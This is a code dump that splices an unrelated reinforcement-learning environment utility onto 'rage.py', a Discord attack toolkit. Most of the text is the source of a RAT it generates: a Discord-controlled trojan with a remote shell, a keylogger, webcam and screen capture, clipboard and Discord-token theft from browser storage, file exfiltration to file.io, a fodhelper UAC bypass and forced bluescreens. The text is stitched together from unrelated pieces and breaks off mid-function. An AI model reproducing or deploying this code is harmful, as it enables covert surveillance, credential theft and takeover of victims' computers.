envs = [env_fn_wrapper() for env_fn_wrapper in env_fn_wrappers.x]
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
remote.send([step_env(env, action) for env, action in zip(envs, data)])
elif cmd == 'reset':
remote.send([env.reset() for env in envs])
elif cmd == 'render':
remote.send([env.render(mode='rgb_array') for env in envs])
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces_spec':
remote.send((envs[0].observation_space, envs[0].action_space, envs[0].spec))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
for env in envs:
env.close()
class SubprocVecEnv(VecEnv):
"""
VecEnv that runs multiple environments in parallel in subproceses and communicates with them via pipes.
Recommended to use when num_envs > 1 and step() can be a bottleneck.
"""
def __init__(self, env_fns, spaces=None, context='spawn', in_series=1):
"""
Arguments:
env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable
in_series: number of environments to run in series in a single process
(e.g. when len(env_fns) == 12 and in_series == 3, it will run 4 processes, each running 3 envs in series)
"""
self.waiting = False
self.closed = False
self.in_series = in_series
nenvs = len(env_fns)
assert nenvs % in_series == 0, "Number of envs must be divisible by number of envs to run in series"
self.nremotes = nenvs // in_series
env_fns = np.array_split(env_fns, self.nremotes)
ctx = mp.get_context(context)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(self.nremotes)])
self.ps = [ctx.Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
with clear_mpi_env_vars():
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces_spec', None))
observation_space, action_space, self.spec = self.remotes[0].recv()
self.viewer = None
VecEnv.__init__(self, nenvs, observation_space, action_space)
def step_async(self, actions):
self._assert_not_closed()
actions = np.array_split(actions, self.nremotes)
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
self._assert_not_closed()
results = [remote.recv() for remote in self.remotes]
results = _flatten_list(results)
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(('reset', None))
obs = [remote.recv() for remote in self.remotes]
obs = _flatten_list(obs)
return _flatten_obs(obs)
def close_extras(self):
self.closed = True
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
def get_images(self):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
imgs = _flatten_list(imgs)
return imgs
def _assert_not_closed(self):
assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"
def __del__(self):
if not self.closed:
self.close()
def _flatten_obs(obs):
assert isinstance(obs, (list, tuple))
assert len(obs) > 0
if isinstance(obs[0], dict):
keys = obs[0].keys()
return {k: np.stack([o[k] for o in obs]) for k in keys}
else:
return np.stack(obs)
def _flatten_list(l):
assert isinstance(l, (list, tuple))
assert len(l) > 0
assert all([len(l_) > 0 for l_ in l])
return [l__ for l_ in l for l__ in l_]
|
rage.py | #SKID THIS = BLACKLISTED! <3
#RAGE was made by ††#7777 | discord.gg/raided
import os, sys, time, requests, os.path, base64, json, threading, string, random, discord, asyncio, httpx, pyautogui, re, http.client, subprocess, shutil
from discord_webhook import DiscordWebhook
from itertools import cycle
from discord.ext import commands
from selenium import webdriver
from datetime import datetime
from PIL import Image
from bs4 import BeautifulSoup
from random import randint
import emoji as ej
import lxml
def title():
os.system('cls' if os.name == 'nt' else 'clear')
print(f"""\n\n
\t\t\t\t ██▀███ ▄▄▄ ▄████ ▓█████
\t\t\t\t ▓██ ▒ ██▒▒████▄ ██▒ ▀█ ▓█ ▀
\t\t\t\t ▓██ ░▄█ ▒▒██ ▀█▄ ▒██░▄▄▄ ▒███
\t\t\t\t ▒██▀▀█▄ ░██▄▄▄▄██░▓█ ██ ▒▓█ ▄
\t\t\t\t ░██▓ ▒██▒▒▓█ ▓██▒▓███▀▒▒░▒████
\t\t\t\t ░ ▒▓ ░▒▓░░▒▒ ▓▒█░▒ ▒ ░░░ ▒░
\t\t\t\t ░▒ ░ ▒ ░ ░ ▒▒ ░ ░ ░ ░ ░
\t\t\t\t ░░ ░ ░ ▒ ░ ░ ░
\t\t\t\t ░ ░ ░ ░ ░
\t\t\t\t
\t\t\t\t> Made by ††#7777 | discord.gg/raided \n\n\n\n""")
def checkvalidity():
src = requests.get('https://discordapp.com/api/v6/auth/login', headers={'Authorization': usertoken})
if src.status_code == 200:
r = requests.get('https://discord.com/api/v9/users/@me', headers=getheaders(usertoken)).json()
global username
username = r.get("username") + "#" + r.get("discriminator")
else:
os.system('cls' if os.name == 'nt' else 'clear')
title()
login()
def login():
global usertoken
usertoken = input(" Token: ")
checkvalidity()
os.system('cls' if os.name == 'nt' else 'clear')
title()
main()
def reset():
os.system('cls' if os.name == 'nt' else 'clear')
title()
def main():
print(f""" {username}> """, end="")
choice = input()
if choice == "tools":
print(f"""\n\tTool Name\tDescription\n\t----------\t------------\n\tselfbot\t\tA simple SelfBot\n\trat\t\tGenerate a RAT.py file\n\traid\t\tSimple Raid Tool\n\tservnuker\tSimple Server Nuker\n\tvidcrash\tVideoCrash Maker\n\tmassreport\tMassive Report a User\n\twspam\t\tSpam WebHooks\n\tfilegrab\tGenerate a TokenGrabber.py file\n\timggrab\t\tCreate a TokenGrabber Image\n\tqrgen\t\tCreate a Fake QrCode Token\n\tipgrab\t\tGrab any User IP\n\taccnuker\tDestroy a Account\n\tdacc\t\tDisable a Account\n\tinfo\t\tGet info of a Discord User\n\tautolog\t\tAutologin with Token\n\tnitrogen\tGenerate Discord Nitro\n\tnsniper\t\tNitro Sniper\n\tcleardm\t\tCLear your DM with a User\n\thousechanger\tChange HypeSquad House\n\tschanger\tStatue Changer\n\tcycle\t\tCycle Discord Color Theme\n\twremover\tDelete a WebHooks Link\n""")
main()
elif choice == "selfbot":
print(f"""\tNon-operational...\n""")
main()
elif choice == "rat":
def discordrat():
global filename, tokenbot
fileName = str(input(f"""\t[+] Enter the name you want to give to the final file: """))
tokenbot = str(input(f"""\t[+] Enter the token of the bot you will use to execute the RAT commands: """))
try:
with open(f"{fileName}.py", "w") as file:
file.write("""import winreg
import ctypes
import sys
import os
import ssl
import random
import threading
import time
import cv2
import subprocess
import discord
from comtypes import CLSCTX_ALL
from discord.ext import commands
from ctypes import *
import asyncio
import discord
from discord import utils
token = '~~TOKENHERE~~'
global appdata
appdata = os.getenv('APPDATA')
client = discord.Client()
bot = commands.Bot(command_prefix='!')
ssl._create_default_https_context = ssl._create_unverified_context
async def activity(client):
import time
import win32gui
while True:
global stop_threads
if stop_threads:
break
current_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
window_displayer = discord.Game(f"Visiting: {{current_window}}")
await client.change_presence(status=discord.Status.online, activity=window_displayer)
time.sleep(1)
def between_callback(client):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(activity(client))
loop.close()
@client.event
async def on_ready():
import platform
import re
import urllib.request
import json
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
data = json.loads(url.read().decode())
flag = data['country_code']
ip = data['IPv4']
import os
total = []
global number
number = 0
global channel_name
channel_name = None
for x in client.get_all_channels():
total.append(x.name)
for y in range(len(total)):
if "session" in total[y]:
import re
result = [e for e in re.split("[^0-9]", total[y]) if e != '']
biggest = max(map(int, result))
number = biggest + 1
else:
pass
if number == 0:
channel_name = "session-1"
newchannel = await client.guilds[0].create_text_channel(channel_name)
else:
channel_name = f"session-{{number}}"
newchannel = await client.guilds[0].create_text_channel(channel_name)
channel_ = discord.utils.get(client.get_all_channels(), name=channel_name)
channel = client.get_channel(channel_.id)
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
value1 = f"@here :white_check_mark: New session opened {{channel_name}} | {{platform.system()}} {{platform.release()}} | :flag_{{flag.lower()}}: | User : {{os.getlogin()}}"
if is_admin == True:
await channel.send(f'{{value1}} | admin!')
elif is_admin == False:
await channel.send(value1)
game = discord.Game(f"Window logging stopped")
await client.change_presence(status=discord.Status.online, activity=game)
def critproc():
import ctypes
ctypes.windll.ntdll.RtlAdjustPrivilege(20, 1, 0, ctypes.byref(ctypes.c_bool()))
ctypes.windll.ntdll.RtlSetProcessIsCritical(1, 0, 0) == 0
def uncritproc():
import ctypes
ctypes.windll.ntdll.RtlSetProcessIsCritical(0, 0, 0) == 0
@client.event
async def on_message(message):
if message.channel.name != channel_name:
pass
else:
total = []
for x in client.get_all_channels():
total.append(x.name)
if message.content.startswith("!kill"):
try:
if message.content[6:] == "all":
for y in range(len(total)):
if "session" in total[y]:
channel_to_delete = discord.utils.get(client.get_all_channels(), name=total[y])
await channel_to_delete.delete()
else:
pass
else:
channel_to_delete = discord.utils.get(client.get_all_channels(), name=message.content[6:])
await channel_to_delete.delete()
await message.channel.send(f"[*] {{message.content[6:]}} killed.")
except:
await message.channel.send(f"[!] {{message.content[6:]}} is invalid,please enter a valid session name")
if message.content == "!dumpkeylogger":
import os
temp = os.getenv("TEMP")
file_keys = temp + r"\key_log.txt"
file = discord.File(file_keys, filename="key_log.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.popen(f"del {{file_keys}}")
if message.content == "!exit":
import sys
uncritproc()
sys.exit()
if message.content == "!windowstart":
import threading
global stop_threads
stop_threads = False
global _thread
_thread = threading.Thread(target=between_callback, args=(client,))
_thread.start()
await message.channel.send("[*] Window logging for this session started")
if message.content == "!windowstop":
stop_threads = True
await message.channel.send("[*] Window logging for this session stopped")
game = discord.Game(f"Window logging stopped")
await client.change_presence(status=discord.Status.online, activity=game)
if message.content == "!screenshot":
import os
from mss import mss
with mss() as sct:
sct.shot(output=os.path.join(os.getenv('TEMP') + r"\monitor.png"))
path = (os.getenv('TEMP')) + r"\monitor.png"
file = discord.File((path), filename="monitor.png")
await message.channel.send("[*] Command successfuly executed", file=file)
os.remove(path)
if message.content == "!webcampic":
import os
import time
import cv2
temp = (os.getenv('TEMP'))
camera_port = 0
camera = cv2.VideoCapture(camera_port)
#time.sleep(0.1)
return_value, image = camera.read()
cv2.imwrite(temp + r"\\temp.png", image)
del(camera)
file = discord.File(temp + r"\\temp.png", filename="temp.png")
await message.channel.send("[*] Command successfuly executed", file=file)
if message.content.startswith("!message"):
import ctypes
import time
MB_YESNO = 0x04
MB_HELP = 0x4000
ICON_STOP = 0x10
def mess():
ctypes.windll.user32.MessageBoxW(0, message.content[8:], "Error", MB_HELP | MB_YESNO | ICON_STOP) #Show message box
import threading
messa = threading.Thread(target=mess)
messa._running = True
messa.daemon = True
messa.start()
import win32con
import win32gui
def get_all_hwnd(hwnd,mouse):
def winEnumHandler(hwnd, ctx):
if win32gui.GetWindowText(hwnd) == "Error":
win32gui.ShowWindow(hwnd, win32con.SW_RESTORE)
win32gui.SetWindowPos(hwnd,win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
win32gui.SetWindowPos(hwnd,win32con.HWND_TOPMOST, 0, 0, 0, 0, win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
win32gui.SetWindowPos(hwnd,win32con.HWND_NOTOPMOST, 0, 0, 0, 0, win32con.SWP_SHOWWINDOW + win32con.SWP_NOMOVE + win32con.SWP_NOSIZE)
return None
else:
pass
if win32gui.IsWindow(hwnd) and win32gui.IsWindowEnabled(hwnd) and win32gui.IsWindowVisible(hwnd):
win32gui.EnumWindows(winEnumHandler,None)
win32gui.EnumWindows(get_all_hwnd, 0)
if message.content.startswith("!wallpaper"):
import ctypes
import os
path = os.path.join(os.getenv('TEMP') + r"\\temp.jpg")
await message.attachments[0].save(path)
ctypes.windll.user32.SystemParametersInfoW(20, 0, path , 0)
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!upload"):
await message.attachments[0].save(message.content[8:])
await message.channel.send("[*] Command successfuly executed")
if message.content.startswith("!shell"):
global status
import time
status = None
import subprocess
import os
instruction = message.content[7:]
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
f1 = open(temp + r"\output.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output.txt", filename="output.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
dele = "del" + temp + r"\output.txt"
os.popen(dele)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
else:
await message.channel.send("[*] Command not recognized or no output was obtained")
status = None
if message.content.startswith("!download"):
import subprocess
import os
filename=message.content[10:]
check2 = os.stat(filename).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
response = requests.post('https://file.io/', files={{"file": open(filename, "rb")}}).json()["link"]
await message.channel.send("download link: " + response)
await message.channel.send("[*] Command successfuly executed")
else:
file = discord.File(message.content[10:], filename=message.content[10:])
await message.channel.send("[*] Command successfuly executed", file=file)
if message.content.startswith("!cd"):
import os
os.chdir(message.content[4:])
await message.channel.send("[*] Command successfuly executed")
if message.content == "!help":
import os
temp = (os.getenv('TEMP'))
f5 = open(temp + r"\helpmenu.txt", 'a')
f5.write(str(helpmenu))
f5.close()
temp = (os.getenv('TEMP'))
file = discord.File(temp + r"\helpmenu.txt", filename="helpmenu.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\helpmenu.txt /f")
if message.content.startswith("!write"):
import pyautogui
if message.content[7:] == "enter":
pyautogui.press("enter")
else:
pyautogui.typewrite(message.content[7:])
if message.content == "!clipboard":
import ctypes
import os
CF_TEXT = 1
kernel32 = ctypes.windll.kernel32
kernel32.GlobalLock.argtypes = [ctypes.c_void_p]
kernel32.GlobalLock.restype = ctypes.c_void_p
kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p]
user32 = ctypes.windll.user32
user32.GetClipboardData.restype = ctypes.c_void_p
user32.OpenClipboard(0)
if user32.IsClipboardFormatAvailable(CF_TEXT):
data = user32.GetClipboardData(CF_TEXT)
data_locked = kernel32.GlobalLock(data)
text = ctypes.c_char_p(data_locked)
value = text.value
kernel32.GlobalUnlock(data_locked)
body = value.decode()
user32.CloseClipboard()
await message.channel.send("[*] Command successfuly executed : " + "Clipboard content is : " + str(body))
if message.content == "!sysinfo":
import platform
jak = str(platform.uname())
intro = jak[12:]
from requests import get
ip = get('https://api.ipify.org').text
pp = "IP Address = " + ip
await message.channel.send("[*] Command successfuly executed : " + intro + pp)
if message.content == "!geolocate":
import urllib.request
import json
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
data = json.loads(url.read().decode())
link = f"http://www.google.com/maps/place/{data['latitude']},{data['longitude']}"
await message.channel.send("[*] Command successfuly executed : " + link)
if message.content == "!admincheck":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
await message.channel.send("[*] Congrats you're admin")
elif is_admin == False:
await message.channel.send("[!] Sorry, you're not admin")
if message.content == "!uacbypass":
import winreg
import ctypes
import sys
import os
import time
import inspect
def isAdmin():
try:
is_admin = (os.getuid() == 0)
except AttributeError:
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
return is_admin
if isAdmin():
await message.channel.send("Your already admin!")
else:
await message.channel.send("attempting to get admin!")
if message.content == "!uacbypass":
uncritproc()
test_str = sys.argv[0]
current_dir = inspect.getframeinfo(inspect.currentframe()).filename
cmd2 = current_dir
create_reg_path = \""" powershell New-Item "HKCU:\SOFTWARE\Classes\ms-settings\Shell\Open\command" -Force \"""
os.system(create_reg_path)
create_trigger_reg_key = \""" powershell New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "hi" -Force \"""
os.system(create_trigger_reg_key)
create_payload_reg_key = \"""powershell Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "`(Default`)" -Value "'cmd /c start python \""" + '""' + '"' + '"' + cmd2 + '""' + '"' + '"\\'"' + \""" -Force\"""
os.system(create_payload_reg_key)
class disable_fsr():
disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
def __enter__(self):
self.old_value = ctypes.c_long()
self.success = self.disable(ctypes.byref(self.old_value))
def __exit__(self, type, value, traceback):
if self.success:
self.revert(self.old_value)
with disable_fsr():
os.system("fodhelper.exe")
time.sleep(2)
remove_reg = \""" powershell Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force \"""
os.system(remove_reg)
if message.content == "!startkeylogger":
import base64
import os
from pynput.keyboard import Key, Listener
import logging
temp = os.getenv("TEMP")
log_dir = temp
logging.basicConfig(filename=(log_dir + r"\key_log.txt"),
level=logging.DEBUG, format='%%(asctime)s: %%(message)s')
def keylog():
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
import threading
global test
test = threading.Thread(target=keylog)
test._running = True
test.daemon = True
test.start()
await message.channel.send("[*] Keylogger successfuly started")
if message.content == "!stopkeylogger":
import os
test._running = False
await message.channel.send("[*] Keylogger successfuly stopped")
if message.content == "!idletime":
class LASTINPUTINFO(Structure):
_fields_ = [
('cbSize', c_uint),
('dwTime', c_int),
]
def get_idle_duration():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
if windll.user32.GetLastInputInfo(byref(lastInputInfo)):
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
else:
return 0
import threading
global idle1
idle1 = threading.Thread(target=get_idle_duration)
idle1._running = True
idle1.daemon = True
idle1.start()
duration = get_idle_duration()
await message.channel.send('User idle for %%.2f seconds.' % duration)
import time
time.sleep(1)
if message.content.startswith("!blockinput"):
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
ok = windll.user32.BlockInput(True)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content.startswith("!unblockinput"):
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
ok = windll.user32.BlockInput(False)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!streamwebcam" :
await message.channel.send("[*] Command successfuly executed")
import os
import time
import cv2
import threading
import sys
import pathlib
temp = (os.getenv('TEMP'))
camera_port = 0
camera = cv2.VideoCapture(camera_port)
running = message.content
file = temp + r"\hobo\hello.txt"
if os.path.isfile(file):
delelelee = "del " + file + r" /f"
os.system(delelelee)
os.system(r"RMDIR %temp%\hobo /s /q")
while True:
return_value, image = camera.read()
cv2.imwrite(temp + r"\\temp.png", image)
boom = discord.File(temp + r"\\temp.png", filename="temp.png")
kool = await message.channel.send(file=boom)
temp = (os.getenv('TEMP'))
file = temp + r"\hobo\hello.txt"
if os.path.isfile(file):
del camera
break
else:
continue
if message.content == "!stopwebcam":
import os
os.system(r"mkdir %temp%\hobo")
os.system(r"echo hello>%temp%\hobo\hello.txt")
os.system(r"del %temp\\temp.png /F")
if message.content == "!getdiscordinfo":
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord": ROAMING + "\\\\Discord",
"Discord Canary": ROAMING + "\\\\discordcanary",
"Discord PTB": ROAMING + "\\\\discordptb",
"Google Chrome": LOCAL + "\\\\Google\\\\Chrome\\\\User Data\\\\Default",
"Opera": ROAMING + "\\\\Opera Software\\Opera Stable",
"Brave": LOCAL + "\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default",
"Yandex": LOCAL + "\\\\Yandex\\\\YandexBrowser\\\\User Data\\Default"
}
def getHeader(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
if token:
headers.update({"Authorization": token})
return headers
def getUserData(token):
try:
return loads(
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getHeader(token))).read().decode())
except:
pass
def getTokenz(path):
path += "\\\\Local Storage\\\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def whoTheFuckAmI():
ip = "None"
try:
ip = urlopen(Request("https://ifconfig.me")).read().decode().strip()
except:
pass
return ip
def hWiD():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\\n")[1]
def getFriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships",
headers=getHeader(token))).read().decode())
except:
pass
def getChat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getHeader(token),
data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def paymentMethods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources",
headers=getHeader(token))).read().decode())) > 0)
except:
pass
def sendMessages(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getHeader(token,
"multipart/form-data; boundary=---------------------------325414537030329320151394843687"),
data=form_data.encode())).read().decode()
except:
pass
def main():
cache_path = ROAMING + "\\\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = whoTheFuckAmI()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in getTokenz(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getUserData(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(paymentMethods(token))
embed = f\"""
Email: {email}
Phone: {phone}
Nitro: {nitro}
Billing Info: {billing}
value: IP: {ip}
Username: {pc_username}
PC Name: {pc_name}
Token Location: {platform}
Token : {token}
username: {username} ({user_id})
\"""
return str(embed)
try:
embed = main()
await message.channel.send("[*] Command successfuly executed\\n"+str(embed))
except Exception as e:
pass
if message.content == "!streamscreen" :
await message.channel.send("[*] Command successfuly executed")
import os
from mss import mss
temp = (os.getenv('TEMP'))
hellos = temp + r"\hobos\hellos.txt"
if os.path.isfile(hellos):
os.system(r"del %temp%\hobos\hellos.txt /f")
os.system(r"RMDIR %temp%\hobos /s /q")
else:
pass
while True:
with mss() as sct:
sct.shot(output=os.path.join(os.getenv('TEMP') + r"\monitor.png"))
path = (os.getenv('TEMP')) + r"\monitor.png"
file = discord.File((path), filename="monitor.png")
await message.channel.send(file=file)
temp = (os.getenv('TEMP'))
hellos = temp + r"\hobos\hellos.txt"
if os.path.isfile(hellos):
break
else:
continue
if message.content == "!stopscreen":
import os
os.system(r"mkdir %temp%\hobos")
os.system(r"echo hello>%temp%\hobos\hellos.txt")
os.system(r"del %temp%\monitor.png /F")
if message.content == "!shutdown":
import os
uncritproc()
os.system("shutdown /p")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!restart":
import os
uncritproc()
os.system("shutdown /r /t 00")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!logoff":
import os
uncritproc()
os.system("shutdown /l /f")
await message.channel.send("[*] Command successfuly executed")
if message.content == "!bluescreen":
import ctypes
import ctypes.wintypes
ctypes.windll.ntdll.RtlAdjustPrivilege(19, 1, 0, ctypes.byref(ctypes.c_bool()))
ctypes.windll.ntdll.NtRaiseHardError(0xc0000022, 0, 0, 0, 6, ctypes.byref(ctypes.wintypes.DWORD()))
if message.content == "!currentdir":
import subprocess as sp
output = sp.getoutput('cd')
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("output is : " + output)
if message.content == "!displaydir":
import subprocess as sp
import time
import os
import subprocess
def shell():
output = subprocess.run("dir", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
if os.path.isfile(temp + r"\output22.txt"):
os.system(r"del %temp%\output22.txt /f")
f1 = open(temp + r"\output22.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output22.txt", filename="output22.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
if message.content == "!dateandtime":
import subprocess as sp
output = sp.getoutput(r'echo time = %time%% date = %%date%')
await message.channel.send("[*] Command successfuly executed")
await message.channel.send("output is : " + output)
if message.content == "!listprocess":
import subprocess as sp
import time
import os
import subprocess
def shell():
output = subprocess.run("tasklist", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
status = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
if status:
result = str(shell().stdout.decode('CP437'))
numb = len(result)
if numb < 1:
await message.channel.send("[*] Command not recognized or no output was obtained")
elif numb > 1990:
temp = (os.getenv('TEMP'))
if os.path.isfile(temp + r"\output.txt"):
os.system(r"del %temp%\output.txt /f")
f1 = open(temp + r"\output.txt", 'a')
f1.write(result)
f1.close()
file = discord.File(temp + r"\output.txt", filename="output.txt")
await message.channel.send("[*] Command successfuly executed", file=file)
else:
await message.channel.send("[*] Command successfuly executed : " + result)
if message.content.startswith("!prockill"):
import os
proc = message.content[10:]
kilproc = r"taskkill /IM" + ' "' + proc + '" ' + r"/f"
import time
import os
import subprocess
os.system(kilproc)
import subprocess
time.sleep(2)
process_name = proc
call = 'TASKLIST', '/FI', 'imagename eq %%s' % process_name
output = subprocess.check_output(call).decode()
last_line = output.strip().split('\\r\\n')[-1]
done = (last_line.lower().startswith(process_name.lower()))
if done == False:
await message.channel.send("[*] Command successfuly executed")
elif done == True:
await message.channel.send('[*] Command did not exucute properly')
if message.content.startswith("!recscreen"):
import cv2
import numpy as np
import pyautogui
reclenth = float(message.content[10:])
input2 = 0
while True:
input2 = input2 + 1
input3 = 0.045 * input2
if input3 >= reclenth:
break
else:
continue
import os
SCREEN_SIZE = (1920, 1080)
fourcc = cv2.VideoWriter_fourcc(*"XVID")
temp = (os.getenv('TEMP'))
videeoo = temp + r"\output.avi"
out = cv2.VideoWriter(videeoo, fourcc, 20.0, (SCREEN_SIZE))
counter = 1
while True:
counter = counter + 1
img = pyautogui.screenshot()
frame = np.array(img)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
out.write(frame)
if counter >= input2:
break
out.release()
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.avi"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.avi /f")
else:
file = discord.File(check, filename="output.avi")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.avi /f")
if message.content.startswith("!reccam"):
import cv2
import numpy as np
import pyautogui
input1 = float(message.content[8:])
import cv2
import os
temp = (os.getenv('TEMP'))
vid_capture = cv2.VideoCapture(0)
vid_cod = cv2.VideoWriter_fourcc(*'XVID')
loco = temp + r"\output.mp4"
output = cv2.VideoWriter(loco, vid_cod, 20.0, (640,480))
input2 = 0
while True:
input2 = input2 + 1
input3 = 0.045 * input2
ret,frame = vid_capture.read()
output.write(frame)
if input3 >= input1:
break
else:
continue
vid_capture.release()
output.release()
import subprocess
import os
temp = (os.getenv('TEMP'))
check = temp + r"\output.mp4"
check2 = os.stat(check).st_size
if check2 > 7340032:
import requests
await message.channel.send("this may take some time becuase it is over 8 MB. please wait")
boom = requests.post('https://file.io/', files={"file": open(check, "rb")}).json()["link"]
await message.channel.send("video download link: " + boom)
await message.channel.send("[*] Command successfuly executed")
os.system(r"del %temp%\output.mp4 /f")
else:
file = discord.File(check, filename="output.mp4")
await message.channel.send("[*] Command successfuly executed", file=file)
os.system(r"del %temp%\output.mp4 /f")
if message.content.startswith("!recaudio"):
import cv2
import numpy as np
import pyautogui
import os
import sounddevice as sd
